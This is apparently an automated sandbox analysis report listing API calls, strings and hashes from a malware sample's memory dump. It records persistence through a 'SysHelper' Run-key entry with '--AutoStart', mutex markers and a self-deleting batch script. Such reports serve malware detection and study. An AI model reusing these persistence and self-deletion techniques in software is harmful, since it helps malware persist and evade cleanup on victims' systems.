                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 643f4cfd30aaeec1c8ecf3a9d163c8c4cfcac590ed4a377865275dc0253cffaa
                                                                                                  • Instruction ID: 1f16e54a32cb0216370934702d37106cf2c69206d2ebfdafbb6409be263f25e7
                                                                                                  • Opcode Fuzzy Hash: 643f4cfd30aaeec1c8ecf3a9d163c8c4cfcac590ed4a377865275dc0253cffaa
                                                                                                  • Instruction Fuzzy Hash: 4FC09B315002404FD725CA28DD613E273B2B797301F56D8D5D11B4B014D73A9015C546
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004824FE
                                                                                                  • GetLastError.KERNEL32 ref: 00482509
                                                                                                  • CloseHandle.KERNEL32 ref: 0048251C
                                                                                                  • CloseHandle.KERNEL32 ref: 00482539
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00482550
                                                                                                  • GetLastError.KERNEL32 ref: 0048255B
                                                                                                  • CloseHandle.KERNEL32 ref: 0048256E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                  • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                  • API String ID: 2372642624-488272950
                                                                                                  • Opcode ID: 2dab8d5e9d862c8e2e1ed33a915b886aa974a470303a7cc59c167ba59c39cc45
                                                                                                  • Instruction ID: 7bbca1f227a0862fcdbc8f1a1b5f1a0e1f2f54aa821c5b39431cd31cb3a7290f
                                                                                                  • Opcode Fuzzy Hash: 2dab8d5e9d862c8e2e1ed33a915b886aa974a470303a7cc59c167ba59c39cc45
                                                                                                  • Instruction Fuzzy Hash: 4F714F76940218ABDF10ABE0EC89FDE7BACFB54705F004596F609E2190DB759A48DF60
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _strncmp
                                                                                                  • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                  • API String ID: 909875538-2733969777
                                                                                                  • Opcode ID: a730b2a50408d818c2e483535589f7bdb341a66b9eb35916ebc59abf9b4e7b3a
                                                                                                  • Instruction ID: b450a283be415a8da617b46b3e3d74a3bef023f8f55c2cee99a0e0631906f8d5
                                                                                                  • Opcode Fuzzy Hash: a730b2a50408d818c2e483535589f7bdb341a66b9eb35916ebc59abf9b4e7b3a
                                                                                                  • Instruction Fuzzy Hash: 3FF106B56083406BD720EF25DC52F9BB7D89F55709F04082FF94896383E678DA0987AB
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 1503006713-0
                                                                                                  • Opcode ID: ffac26f58ec81004baa1d38e378c5c864556bdea31350e09b834098f8df044eb
                                                                                                  • Instruction ID: 81cb76c591efaec1a3862df3b6371834b3a35d60165995e7009a1f59306018c8
                                                                                                  • Opcode Fuzzy Hash: ffac26f58ec81004baa1d38e378c5c864556bdea31350e09b834098f8df044eb
                                                                                                  • Instruction Fuzzy Hash: E9219235109A01AFEF227F66D806E0F7FE4DF81768B30443FF44459192EA6AA8109B9D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0048BB49
                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 0048BBBA
                                                                                                  • _malloc.LIBCMT ref: 0048BBE4
                                                                                                  • GetComputerNameW.KERNEL32(00000000,?), ref: 0048BBF4
                                                                                                  • _free.LIBCMT ref: 0048BCD7
                                                                                                    • Part of subcall function 00481CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,0053AC68,000000FF), ref: 00481D12
                                                                                                    • Part of subcall function 00481CD0: _memset.LIBCMT ref: 00481D3B
                                                                                                    • Part of subcall function 00481CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00481D63
                                                                                                    • Part of subcall function 00481CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0053AC68,000000FF), ref: 00481D6C
                                                                                                    • Part of subcall function 00481CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00481DD6
                                                                                                    • Part of subcall function 00481CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00481E48
                                                                                                  • IsWindow.USER32(?), ref: 0048BF69
                                                                                                  • DestroyWindow.USER32(?), ref: 0048BF7B
                                                                                                  • DefWindowProcW.USER32(?,00008003,?,?), ref: 0048BFA8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3873257347-0
                                                                                                  • Opcode ID: c5c63ec14d53cc48f6a015fef4d6b3f5b9f74135a545a2322a607b4c50314586
                                                                                                  • Instruction ID: 0f650a70d44b764bcaa1ee86dac6cc9bcea2b2631298c703fabedc6e9f44e11e
                                                                                                  • Opcode Fuzzy Hash: c5c63ec14d53cc48f6a015fef4d6b3f5b9f74135a545a2322a607b4c50314586
                                                                                                  • Instruction Fuzzy Hash: 87C19E71508340AFDB20EF28D84576FBBE0FF95318F04492EF588963A1D7799808DB9A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DecodePointer_write_multi_char_write_string$__aulldvrm__cftof_free_strlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 559064418-0
                                                                                                  • Opcode ID: 73def03de2f75844b8c761c22b769771a07d06f090dd3277e132cd0e115a3217
                                                                                                  • Instruction ID: 02a6e76cd0ed2b5ff04930e2f1351992584dad3beb3e51c8ec8e264e5ee18f31
                                                                                                  • Opcode Fuzzy Hash: 73def03de2f75844b8c761c22b769771a07d06f090dd3277e132cd0e115a3217
                                                                                                  • Instruction Fuzzy Hash: BFB1B271D292299FDF309B54CC89BAABFB5FF54314F1400EAD908A6251E7389E80DF58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • DecodePointer.KERNEL32 ref: 00497B29
                                                                                                  • _free.LIBCMT ref: 00497B42
                                                                                                    • Part of subcall function 00490BED: HeapFree.KERNEL32(00000000,00000000,?,0049507F,00000000,0049520D,00490CE9), ref: 00490C01
                                                                                                    • Part of subcall function 00490BED: GetLastError.KERNEL32(00000000,?,0049507F,00000000,0049520D,00490CE9), ref: 00490C13
                                                                                                  • _free.LIBCMT ref: 00497B55
                                                                                                  • _free.LIBCMT ref: 00497B73
                                                                                                  • _free.LIBCMT ref: 00497B85
                                                                                                  • _free.LIBCMT ref: 00497B96
                                                                                                  • _free.LIBCMT ref: 00497BA1
                                                                                                  • _free.LIBCMT ref: 00497BC5
                                                                                                  • EncodePointer.KERNEL32(008A0968), ref: 00497BCC
                                                                                                  • _free.LIBCMT ref: 00497BE1
                                                                                                  • _free.LIBCMT ref: 00497BF7
                                                                                                  • _free.LIBCMT ref: 00497C1F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 3064303923-0
                                                                                                  • Opcode ID: f85006ff6c2fc77aad61fc88cc74e710f5f913b457cb871b90a9bc094e1b932c
                                                                                                  • Instruction ID: 6ed33edb5d8aafac43d40be517b5fedcdd765e470567940d603a3433bb2324d2
                                                                                                  • Opcode Fuzzy Hash: f85006ff6c2fc77aad61fc88cc74e710f5f913b457cb871b90a9bc094e1b932c
                                                                                                  • Instruction Fuzzy Hash: 2F215E368081508FCE205F55BC4490A7F64EB10728315143FED147B3B1C678788DABD8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 00481BB0
                                                                                                  • CoCreateInstance.OLE32(0053E908,00000000,00000001,0053D568,00000000), ref: 00481BC8
                                                                                                  • CoUninitialize.OLE32 ref: 00481BD0
                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00481C12
                                                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00481C22
                                                                                                  • lstrcatW.KERNEL32(?,00570050), ref: 00481C3A
                                                                                                  • lstrcatW.KERNEL32(?), ref: 00481C44
                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00481C68
                                                                                                  • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00481C7A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                  • String ID: \shell32.dll
                                                                                                  • API String ID: 679253221-3783449302
                                                                                                  • Opcode ID: fba94990ae8dee0bf81b80ff7d499415d0bb9ae3e72bc703c764c13abb728c07
                                                                                                  • Instruction ID: 7a95ddbc4818bd53151f234fd344808f9e852f5b4c4bb7e0220addb120374201
                                                                                                  • Opcode Fuzzy Hash: fba94990ae8dee0bf81b80ff7d499415d0bb9ae3e72bc703c764c13abb728c07
                                                                                                  • Instruction Fuzzy Hash: 33412E71A40219AFDB10DBA4CC88FAE7BBCEF44705F10449AF505E7250D6B1AE45CB60
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000001,?,004C4B72), ref: 004C49C7
                                                                                                  • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004C49D7
                                                                                                  • GetDesktopWindow.USER32 ref: 004C49FB
                                                                                                  • GetProcessWindowStation.USER32(?,004C4B72), ref: 004C4A01
                                                                                                  • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,004C4B72), ref: 004C4A1C
                                                                                                  • GetLastError.KERNEL32(?,004C4B72), ref: 004C4A2A
                                                                                                  • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,004C4B72), ref: 004C4A65
                                                                                                  • _wcsstr.LIBCMT ref: 004C4A8A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                  • String ID: Service-0x$_OPENSSL_isservice
                                                                                                  • API String ID: 2112994598-1672312481
                                                                                                  • Opcode ID: 372ea2faa850fbc53f8e266d003b9dd0ff542cc29aca33c8786be58b16d0733e
                                                                                                  • Instruction ID: 2df2719c4cf962f730fe54ba55e45485708b798c55a35f144bf3fc07c68f7481
                                                                                                  • Opcode Fuzzy Hash: 372ea2faa850fbc53f8e266d003b9dd0ff542cc29aca33c8786be58b16d0733e
                                                                                                  • Instruction Fuzzy Hash: FA310935A401049BDB24DBB9DC06BAF7BB8EFD4720F10026EE816E32D0EB3599048B59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F4,004C4C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,004C480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,004C1D37,00000000,0047CDAE,00000001,00000001), ref: 004C4AFA
                                                                                                  • GetFileType.KERNEL32(00000000,?,004C1D37,00000000,0047CDAE,00000001,00000001), ref: 004C4B05
                                                                                                  • __vfwprintf_p.LIBCMT ref: 004C4B27
                                                                                                    • Part of subcall function 0049BDCC: _vfprintf_helper.LIBCMT ref: 0049BDDF
                                                                                                  • vswprintf.LIBCMT ref: 004C4B5D
                                                                                                  • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 004C4B7E
                                                                                                  • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 004C4BA2
                                                                                                  • DeregisterEventSource.ADVAPI32(00000000), ref: 004C4BA9
                                                                                                  • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 004C4BD3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                  • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                  • API String ID: 277090408-1348657634
                                                                                                  • Opcode ID: ad05b9e6b1f2cdb79bae7c93c76382f2c43b4d50d11fc35ac002aec8a24b724e
                                                                                                  • Instruction ID: 1a4d5d24c81dac83b280b17f0559bf53ef963cb0f7d3daebfface9b805552cc9
                                                                                                  • Opcode Fuzzy Hash: ad05b9e6b1f2cdb79bae7c93c76382f2c43b4d50d11fc35ac002aec8a24b724e
                                                                                                  • Instruction Fuzzy Hash: 9B210A75644300ABEB71A760CC47FEF7BD8AF98704F40482EB699D62D0EAB894448757
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00482389
                                                                                                  • _memset.LIBCMT ref: 004823B6
                                                                                                  • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004823DE
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004823E7
                                                                                                  • GetCommandLineW.KERNEL32 ref: 004823F4
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004823FF
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048240E
                                                                                                  • lstrcmpW.KERNEL32(?,?), ref: 00482422
                                                                                                  Strings
                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0048237F
                                                                                                  • SysHelper, xrefs: 004823D6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                  • API String ID: 122392481-4165002228
                                                                                                  • Opcode ID: 6d5e611f46c6735e7f9ba53a52862ab50d5c7c8a48ceba8969d23103f8ef4ecb
                                                                                                  • Instruction ID: ca4f9ed19e26d50f21fa57153fc4ba4c2c2edef32fa2bd62689c2daa6a95626c
                                                                                                  • Opcode Fuzzy Hash: 6d5e611f46c6735e7f9ba53a52862ab50d5c7c8a48ceba8969d23103f8ef4ecb
                                                                                                  • Instruction Fuzzy Hash: F911297294020DABDF10DBA0DC49FEE7BBCBB04705F0045A5B509E2251EBB49A88AB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 004BF27F
                                                                                                    • Part of subcall function 004A0CFC: std::exception::_Copy_str.LIBCMT ref: 004A0D15
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004BF294
                                                                                                    • Part of subcall function 004A0ECA: RaiseException.KERNEL32(?,?,?,<yW,?,?,?,?,?,00493B9C,?,0057793C,?,00000001), ref: 004A0F1F
                                                                                                  • std::exception::exception.LIBCMT ref: 004BF2AD
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004BF2C2
                                                                                                  • std::regex_error::regex_error.LIBCPMT ref: 004BF2D4
                                                                                                    • Part of subcall function 004BEF74: std::exception::exception.LIBCMT ref: 004BEF8E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004BF2E2
                                                                                                  • std::exception::exception.LIBCMT ref: 004BF2FB
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004BF310
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
